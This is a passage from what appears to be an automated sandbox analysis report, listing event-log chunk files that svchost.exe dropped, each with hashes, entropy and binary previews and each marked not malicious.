                                                Preview:ElfChnk.....................................0.......:........................................................................D.................b...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................;...c#..{1..k:...................v..........**..x............|M.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.45779215578229077
                                                Encrypted:false
                                                SSDEEP:96:U2NVaO8sMa3Z85ZMLgrjjIZ3Z85ZQu3Z85Z7v3Z85Zu:UAV7pp8nMLEvUp8nDp8nLp8n
                                                MD5:7DDF5A276B0087A560964A33603C6CF2
                                                SHA1:6CAF593A6B373F46314D5B1F3F3E76D67EA6DEF7
                                                SHA-256:2D97C25ED370C5DABE11C700A868C0BBFEF27BDF740FE8104DFC0809C7DFB613
                                                SHA-512:3CDFA091F738672684152C2F13F7AB5259C6EF3B1DD693E359E883478D739277EBA90A6CB36B60EA1306A7F64B678089D0F7782544176A1DD29D6314ABFB9FE2
                                                Malicious:false
                                                Preview:ElfChnk.....................................P..............................................................................................................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.248110473220085
                                                Encrypted:false
                                                SSDEEP:1536:YbBN2A4VD7VAx8whAGU2woJQghYAxgRzAlUnF9:
                                                MD5:87681F2AD6FCB19982924DCE6A2D7A27
                                                SHA1:6C4D49C5504D6DE6E63B44753C607B3362B79B57
                                                SHA-256:1CA289F8F7FD7DD1D67EDA5691EF4B083120E456204CC8F6923AFCCD700183BC
                                                SHA-512:8F1309E5DD7B017945ABF5EB7E869AA1C04A27C37DB7C3A735A2CB31D815B67643D37DAD93FB89FFF2B6BC213EAE1E55201075DAEAFA39A6B1656A214990DEBA
                                                Malicious:false
                                                Preview:ElfChnk.........]...............]...............0...........................................................................>...............................................=...................................................................................%.......................................X...............?...............................................M...F.......................................................................................>...........................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.625347651139654
                                                Encrypted:false
                                                SSDEEP:1536:+XY5nVYIyyqED5BVZUevOBtNPhPVwCRPvf:+XY5nVYIyyqED5BVZUevOBtNPhPVwChf
                                                MD5:890CA9963C766DA05E491710E1CD9D7F
                                                SHA1:3F95AB4363D5DB533E60748F69A364196BAC8920
                                                SHA-256:47523E0AC40BC366CD0A86BE9A72ECEF3A72EE7D430B25A61D8DF55341C19531
                                                SHA-512:C2D739AE5ABF76C627DA8B863CC73FF31F7C7733138DB2954A3102377FD0270F69FE269EEAE0DE4172E53E194C3B71791CD09B36F880DC726665004FD9C6A07F
                                                Malicious:false
                                                Preview:ElfChnk.........................................`....:..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v.......................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.0424643703503667
                                                Encrypted:false
                                                SSDEEP:384:/hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorBort6ohorRorsor1orN:/DCRTh
                                                MD5:B6F126C0085E8F3D19928CC2ED46E73A
                                                SHA1:171B7A5ECC69E17659D7E4BA7BF869F2969CCF69
                                                SHA-256:B0E4D0D05D3821255226AAEA48241501E31EA40F049CB9CA96B6985F9B65EEE6
                                                SHA-512:BF77E294489B94E8A489C4A11DB22A0F8491327334C122E87EA72391A0EA1C0AD7ECC43EB9EA26CFFA6CC95C28F106A7D50A6F658C7312927C1726ACBB49DBF3
                                                Malicious:false
                                                Preview:ElfChnk.........)...............)............b...d...'a........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................E/..............])..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 207715216474546355539665747968.000000
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8526226240352849
                                                Encrypted:false
                                                SSDEEP:384:YhAiPA5PNPxPEPHPhPEPmPSPRP3PoPqP7DPfPqP/P:Y2NP
                                                MD5:585F5E645713292DF375B49B2BDC28EA
                                                SHA1:42531DC7FEDA50E16705A1260EC70B5AD7015FCB
                                                SHA-256:E16C3A02C9E22074AE98621BB170E12D41A54187FCC6D53B5600F5712F37A9FF
                                                SHA-512:0C0008188EC621D5FE00CF9211729347A941AF2DE55DA3333114D83B4D181FB8792C64FA0F62309660F51FF26349684D35EAC0A4E0FE98898D1C03CAAB65B434
                                                Malicious:false
                                                Preview:ElfChnk......................................%...&...A..................................................................... p..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8442469423268683
                                                Encrypted:false
                                                SSDEEP:384:DhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:DWXSYieD+tvgzmMvB2R387
                                                MD5:A12D2A18D158FA0E4EBA801B76795EAC
                                                SHA1:22C6C36D8E0ACD32735F5C0D25929CD734A2DB9F
                                                SHA-256:4A2A9FFE44AB14DE2504B3632FBDDC8EC4E3B35AFF6C5CCA75AB5095E164E39E
                                                SHA-512:729117B98F2FA8D18DD3A9B0A373EA5CD36A9B88BA54A45579DE0C50C68DABAB50096CC3078DDA1C11A7483D95CD6B39A54AF35282B1C2550F0AAE4A80F8BEA9
                                                Malicious:false
                                                Preview:ElfChnk......................................$...&.....i....................................................................x..(................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................&...............................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.267011945104217
                                                Encrypted:false
                                                SSDEEP:384:9hqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28O:9bCyhLfI931D
                                                MD5:D2CE26C80BD0C32F79B606F2AD1A54EB
                                                SHA1:77260713F9C29EF2C8BFFF4CE9E95B51A8003E62
                                                SHA-256:6C53DCA9EB6390EA9AE107605D3D8E24B1DD84F29431591589E26102F4133399
                                                SHA-512:792FA458EAF855AB738B5574F063F7D2EBF3FACF00C973E3E2795B3FC1E67AB29BC6857E2B28E6526B25EEF96E957FCD62B9030CA1C7314DDB3D4DB1CD7D7718
                                                Malicious:false
                                                Preview:ElfChnk.........P...............P...........p.........b}....................................................................1.>h................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......6t..............................................................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.4167677203077242
                                                Encrypted:false
                                                SSDEEP:768:lcMhFBuyKskZljdoKXjtT/r18rQXn8uwgSj70FTP:GMhFBuV80
                                                MD5:6B644AF0992B17A39AE8ECCCE8D52371
                                                SHA1:B7C16851857F0A32C01DA8BA4F3BC9CD70B61FC5
                                                SHA-256:1807F395B6FA66E27A915D4657E67AF6F4DC6EB3500632AF389F2508EA60457D
                                                SHA-512:59E5498E32F34E48BF2C8C6A613AC61132F54D6558FF0DFF09CD023180519A8FD266FBD40CA2B6F24A1EEAA55040359C4060374E81E1E93720437CA6D70B9BCA
                                                Malicious:false
                                                Preview:ElfChnk.........P...............P...............h....7.c.......................................................................F................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.899710510612546
                                                Encrypted:false
                                                SSDEEP:768:AtvigdzejvAzBCBao/F6Cf2SEqEhwaK41HZalMIq9Iz6IOTLGfFXN/E:aFH+dqWzrhFXN/E
                                                MD5:BAD1AE6E5B5E3828EAC3BB72057462EA
                                                SHA1:FF055B8560C3014432C8B95D5A0BFFA903AE4400
                                                SHA-256:F57EE742E86BC90D509D8D3EE1F8FED75A8B76BC09A427376C7F5F5AE0760339
                                                SHA-512:630FAEC55EA1AD429921EBA196D78685D8DEF49F9D9FB9A45462F65A809823A837030C1C137A96767EDA9AEB710CB4A847B190232F53516302B9402D110FF92C
                                                Malicious:false
                                                Preview:ElfChnk.w...............w.............................E....................................................................,.G.................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..H...w...........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.0943130840504693
                                                Encrypted:false
                                                SSDEEP:384:Rh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDq:RMAP1Qa5AgfQQhC
                                                MD5:857D79A241171E746E060E429FC2560B
                                                SHA1:99B6F61CCD3AD8F9D82712B04B4E51701E693CC8
                                                SHA-256:7DDE0A893BD2EAE686B5AD71D1AA76FE4E666D328E463E646FDB63F8B2468FDA
                                                SHA-512:3AF01C2C89D004ACD0E5A6861BE2A3B0B819F23B92BB4C3466BC2630131E246AD3CA4151C7A84A338D86555F8F3FE989779E4AEA282ED2B8A00E23D0668A4CFC
                                                Malicious:false
                                                Preview:ElfChnk.....................................hi..hl.....&.....................................................................R.=................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........Y...............................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.441475404183629
                                                Encrypted:false
                                                SSDEEP:768:ZbM5eahvB94LSAoiMTQMrj+/IVvu4mJY0YCOO:dMAaZBLzn6fYZO
                                                MD5:B7F318BB9FA336235CCBE5A391775D8E
                                                SHA1:F7F7CFF57A6BB00B4E6F17E39BAAF2443E08878D
                                                SHA-256:D59515423F15D3618746447E1333945BF1432B9B4C20B54849050CE17C72311D
                                                SHA-512:1C8FA8FD31BC4A3C6815A473C00187497E7E71CAF1FAD61F5A6D73DBEB6AE9D551A3DAA6B39B76A4D1401A061844036D5D06469A3942BC030B276D4E186C7289
                                                Malicious:false
                                                Preview:ElfChnk.r...............r...................0.......A..@....................................................................k...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F....................+...............)......55......................&.......E....@......M#..............u7.......1.........../...........!..]>......**......r.......R...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-4108, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 308596736.000000
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.4699263306571524
                                                Encrypted:false
                                                SSDEEP:384:6hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klq:61T4hu7OJscMmza
                                                MD5:86173450A7EE15BC5B6A2C667DD3B040
                                                SHA1:200635B7FB3137AB9A33A6551182F4BA05BDCE84
                                                SHA-256:AEDE5AAE515D2A3C78BA23C631D178DCCB3E775CD3B4FB6F0406887FAEDE5B88
                                                SHA-512:3A73438F1A7B3B2F166B2B2F70E713F7393A2F2D5DF23858D05F2790BD2DF5B2CDC38263EC72ECC34621C82C44308E3C0474E295C678642E30146CAC27D69067
                                                Malicious:false
                                                Preview:ElfChnk.........s...............s..............x....,........................................................................5.................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.450965793914843
                                                Encrypted:false
                                                SSDEEP:384:phFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfO:pzSKEqsMuy6CL3
                                                MD5:3914FD52494E203A25B69F9F4221031F
                                                SHA1:8046E0D1C78A47632A4550AC66FC9917E6429457
                                                SHA-256:D2D37391EC1325C6C27486311C5B5E1D11C55D0A464270F009E3D3E1B2A54D3B
                                                SHA-512:12FB89D2F9A5B19C7150D23A09A7C7B3F5616C09C8A83AE83A331263F0FA45181066F1A44080A46FE3A9F551BDF56485BD03DB9001FE82388DCDB1EF3FBC7829
                                                Malicious:false
                                                Preview:ElfChnk.........L...............L...................=....................................................................... ..H................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................`..............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.1568075545974956
                                                Encrypted:false
                                                SSDEEP:384:ZhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zg:Zmw9g3LCjg
                                                MD5:F3CF496665845DA6C957242770973ECE
                                                SHA1:BF7206ECD6C6ABE687BE10A157C86C7EBE59C6BD
                                                SHA-256:BB190FF3FA391F3B69F3E4509B14D6DE320C980D69A59BC74DBD57BD8AA42F7F
                                                SHA-512:EA5A2D21353556B5B6FC420671E5F7026B6A280C7CD740CD1CAFA2C958318B5BB6A5F4AE6A00450E2A7997425A0AAAFFD158452401ABB732CA985A8DE3548213
                                                Malicious:false
                                                Preview:ElfChnk.........6...............6...........(o...p..........................................................................y.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n........X..............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.8853799397148268
                                                Encrypted:false
                                                SSDEEP:384:5hCI2LwuSsYI8tIbLIYoI/IE6IQsIhIxIUIfIXIAI2I/IRIvI:5Z
                                                MD5:FACBCFA717058EFCED1754221D6A421D
                                                SHA1:1BA10B3E2BB8A2C739257CE228789E2D6C4F1A1D
                                                SHA-256:6F6A7779828D79A41F94AF9EE452BB44EE0E495D27A5B5DE7DAD659A6865C9CB
                                                SHA-512:0253FDCC88D3E52A9A26A065AC0C4E264DC0E84CB6A175D09BEC79E56D5282B9B95DCE2FEF47C48505D34C629388904AA6E2BDFF81759920FE314D6F9F5A6DB0
                                                Malicious:false
                                                Preview:ElfChnk.K.......L.......K.......L...............@6..u..B.....................................................................w..................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**......K.......1E..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 130, DIRTY
                                                Category:dropped
                                                Size (bytes):70168
                                                Entropy (8bit):4.524773468886577
                                                Encrypted:false
                                                SSDEEP:768:38Ho4AS8Ho4AoEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4d:zp
                                                MD5:6FE5DD5128393DA4CD3DB4D22C0312F5
                                                SHA1:D8BC98927CA24FE6D41AFEC14B9C4618C5C9C7BA
                                                SHA-256:3F69F116AEC3EFFDEA78FCAB92926C1031791B3EF077CBDF9B87AD69E06EFABB
                                                SHA-512:9DEBFF259802DE682E04B808B29E058BF39573CDEE78736E8CF6E9C557A59ACA5D2E69E47328E306AECDE87DDA50F9985016CE0C5B60439C4F7C8B4BD3928C72
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................T...ElfChnk.~...............~...........................M.l.......................................................................ZG................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..x...~.......Rirz`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):75888
                                                Entropy (8bit):5.583856889071563
                                                Encrypted:false
                                                SSDEEP:384:hhoa5J29o2KFzyzIz9a5bzuzNz0zxzuewKWMKOa5KVhoa5J29o2KFzyzIz9a5bzL:hMXVMXYpytFNZHXdKglQA303eu
                                                MD5:0CF4F79ECF2FCEBE97CFD24865A481A7
                                                SHA1:88A573A9E2BA5ECE60B08F52B5A965342ABD815C
                                                SHA-256:11FD04D741B84E8437C7B86586672147A1DCDBAF9EC8E443B77085FC93E53A9B
                                                SHA-512:6B8A75E262680F3E325B32F390D2DF1449765B9B6803FE7136E9235F4BF56C4C629D0CBC724CDE41265532079034BE01A1C970E8B77B015EABCC974E2C2FB4AB
                                                Malicious:false
                                                Preview:ElfChnk......................................$..p(..e.........................................................................T................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&....................................................................%..........**............................E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.0596696487276978
                                                Encrypted:false
                                                SSDEEP:384:Qh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpHMXmM+ZM6Zz:QeJ+
                                                MD5:F6D375E51341AC949A73803CF00B96E6
                                                SHA1:5DB3BF9A34145DD777EA9593DE3C8054B08A11D1
                                                SHA-256:EBDFA834049A08F8FC9B3DD35800233E75BDB480D59E548D7F4F3F2720B889F9
                                                SHA-512:1714A4243ECEB63E23583F31D3D6C161D8423E1AD2D1E1440545718E6DA879F74C2F03E5C21120ED826093777F6DEEEFEC57B913E1B4C1D74C0B8A473752460B
                                                Malicious:false
                                                Preview:ElfChnk.........................................X0.....!....................................................................B...........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6(..............................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.241268628600426
                                                Encrypted:false
                                                SSDEEP:384:Thk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1/:TBjdjP0csQqL
                                                MD5:602FD635C1BE2C0F087784BAE052554B
                                                SHA1:77EE62511C78BA6989DF77AC6B616422A44D7F54
                                                SHA-256:78FC5D1D71915650A8080B217B8B28F799B054F35C89AAB2C474DC4B9C3F0581
                                                SHA-512:8A66621CE4233D42AE83A0046A04628F4A88D91713C064944A61AFDF3F33D44E54E416A8441D1FFFDDCEA2E909761BBF151894881B4F93C0D238537939E21217
                                                Malicious:false
                                                Preview:ElfChnk...............................................j.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&..............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.475283731894672
                                                Encrypted:false
